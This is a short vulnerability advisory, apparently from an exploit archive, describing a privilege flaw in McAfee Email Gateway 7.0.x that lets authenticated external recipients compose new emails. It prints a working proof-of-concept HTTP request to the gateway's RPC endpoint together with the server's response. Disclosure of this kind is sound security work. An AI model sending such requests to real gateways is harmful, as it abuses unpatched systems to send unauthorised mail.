McAfee Email Gateway Arbitrary Email Creation - Authenticated

Vulnerability Title: McAfee Email Gateway Arbitrary Email Creation - Authenticated

Vulnerable System:

  • McAfee Email Gateway (MEG) 7.0, 7.0.1 and 7.0.

Description:

By default it looks that external recipients can only receive emails and respond to them.
However, as long as the option is known it is possible to compose a new message without having the privileges to do so.

Exploit:

Request:

GET /cgi-bin/rpc/index.pl?q={"rpcMethod":"cm","u":"xxxxxxxx=","s":"xxxxxxx-xxxxxxxxx_GT2PJdsTk=","to":"random@random.com"} HTTP/1.1
Host: xxxxxxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: rpp=25; _s=xxxxxxxx-xxxxxxxxx_GT2PJdsTk= </code>

Response:

HTTP/1.1 200 OK
Date: Mon, 24 Sep 2012 23:16:03 GMT
Server: Apache/2.2.21 (Unix)
Pragma: no-cache
Cache-control: no-cache
Connection: close
Content-Type: application/json; charset=utf-8
Expires: Mon, 24 Sep 2012 23:16:03 GMT
Content-Length: 721

{"uid":"xxxxxxxxx=","original":null,"status":"OK","response":{"detail":{"body":{"content_type":"text/plain","content":null,"charset":"ascii","full_filename":null},"preamble":null,"epilogue":null,"meta":{"cid_attachments":{},"snippet":"","attachments":[],"headers":[["Reply-To","replyemail@random.com"],["Errors-To","replyemail@random.com"],["From","\"replyemail@random.com\" <securemail@xxxxxxx.com>"],["Message-ID","731c_0002_cfaab7d2_069d_11e2_85cc_001e671eccc0"],["Date","Mon, 24 Sep 2012 18:16:03 -0500"],["Subject",""],["To","random@random.com"]]}},"expires_in":864000,"status":"DRAFT","id":"731c_0002_cfaab7d2_069d_11e2_85cc_001e671eccc0"},"type":"new"}

Impact: Impact is low, due to the fact that they need valid credentials to be exploited.

Recommendation:

Please see the following knowledgebase article:
https://kc.mcafee.com/corporate/index?page=content&id=SB10037&locale=en_IN&viewlocale=en_IN

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.